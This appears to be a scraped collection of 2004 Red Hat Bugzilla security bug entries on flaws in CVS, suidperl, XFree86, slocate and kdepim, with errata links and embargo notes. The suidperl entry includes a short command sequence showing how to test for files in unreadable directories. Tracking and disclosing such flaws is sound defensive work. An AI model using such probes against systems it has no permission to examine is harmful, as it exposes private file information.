a AuthNonce secret. This could allow a malicious user who is able to sniff
network traffic to conduct a replay attack against a website using Digest
protection. Note that mod_digest implements an older version of the MD5
Digest Authentication specification which is known no
Bugzilla
CAN-2003-0977 fix pushed for RH9, but not FC1
bugzilla·2004-03-20
[MEDIUM] CAN-2003-0977 fix pushed for RH9, but not FC1
CAN-2003-0977 fix pushed for RH9, but not FC1
Description of problem:
CAN-2003-0977 fix pushed for RH9, but not FC1
Version-Release number of selected component (if applicable):
cvs-1.11.5-3
Additional info:
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=111221#c5
https://rhn.redhat.com/errata/RHSA-2004-003.html
http://ccvs.cvshome.org/servlets/NewsItemView?newsID=84
http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0081.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0977
Discussion:
A rebuild from cvs-1.11.11-1 (or higher) from Fedora Development
at Fedora Core 1 solves the problem, so maybe one of the Red Hat
maintainers could do that? Would be very nice :)
BTW: Maybe the kerberos 4 support has to be disabled.
---
Maybe that issue is fixed soon by one of
Bugzilla
CVE-2003-0618 leaks file existance information
bugzilla·2004-02-04·CVSS 2.1
CVE-2003-0618 [LOW] CVE-2003-0618 leaks file existance information
CVE-2003-0618 leaks file existance information
CAN-2003-0618 was reported 2003Jul29 to Debian. You can test for the
existance of files even if you don't have permission to do so by using
the suidperl command.
$ su
# mkdir ~root/delme; chmod 700 ~root/delme;touch ~root/delme/1
# exit
$ suidperl ~root/delme/1
Script is not setuid/setgid in suidperl
$ suidperl ~root/delme/2
Can't open perl script "/root/delme/2": No such file ...
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=220486
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=203426
Affects: 2.1AS 2.1ES 2.1AW 2.1WS (5.6.1)
Affects: 3AS 3ES 3WS (5.8.0)
Debian released an errata for this issue in Feb 2004.
Discussion:
Actually this doesn't affect RHEL3 because the setuid perl package was
not shipped.
---
I did some verification
Bugzilla
CAN-2004-0083 XFree86 font.alias overflow
bugzilla·2004-02-04
[MEDIUM] CAN-2004-0083 XFree86 font.alias overflow
CAN-2004-0083 XFree86 font.alias overflow
Reported to Red Hat by XFree86 on 2004Feb03 via
iDefense.
A malicious user may craft a malformed 'font.alias' file causing a
buffer overflow upon parsing, which could lead to execution of
arbitrary code as root on the server.
Embargoed. No date for public notification set; CVE applied for.
Patch available. Last update was RHSA-2003:289. Will be backported
to 4.1.0. Errata in progress.
Discussion:
CAN-2004-0083, embargo lifts on Feb11
---
Subsequently, iDefense found another issue in the same routine with
the same consequences which has been given CVE name CAN-2004-0083.
Additionally David Dawes discovered additional flaws in reading font
files. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2004-
Bugzilla
CAN-2003-0848 slocate buffer overflow
bugzilla·2004-01-21
[MEDIUM] CAN-2003-0848 slocate buffer overflow
CAN-2003-0848 slocate buffer overflow
A heap-based buffer overflow in slocate can allow local users to gain
"slocate" privileges via a modified slocate database that causes a
negative "pathlen" value.
Discussion:
Um, I think you have the wrong CVE name; it is CAN-2003-0848... :-)
---
An errata has been issued which should help the problem described in this bug report.
This report is therefore being closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files, please follow the link below. You may reopen
this bug report if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2004-040.html
Bugzilla
CAN-2003-0988 kdepim VCF parsing vulnerability
bugzilla·2004-01-07
[MEDIUM] CAN-2003-0988 kdepim VCF parsing vulnerability
CAN-2003-0988 kdepim VCF parsing vulnerability
The KDE team found a buffer overflow in the file information reader of
VCF files. An attacker could construct a VCF file so that when it was
opened by a victim it would execute arbitrary commands. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the
name CAN-2003-0988 to this issue.
CAN-2003-0988 Affects: 3AS 3ES 3WS
Note the kdepim packages in RHEL 2.1 are not affected by this issue.
RHSA-2004:005 will provide updated packages with a backported security
patch.
This issue is under embargo and will be opened on January 14th 2004.
Discussion:
Fixed, see http://rhn.redhat.com/errata/RHSA-2004-005.html
http://marc.info/?l=bugtraq&m=108386181021070&w=2http://secunia.com/advisories/11569http://www.osvdb.org/5945http://www.securityfocus.com/bid/10295https://exchange.xforce.ibmcloud.com/vulnerabilities/16078http://marc.info/?l=bugtraq&m=108386181021070&w=2http://secunia.com/advisories/11569http://www.osvdb.org/5945http://www.securityfocus.com/bid/10295https://exchange.xforce.ibmcloud.com/vulnerabilities/16078
2004-05-06
Published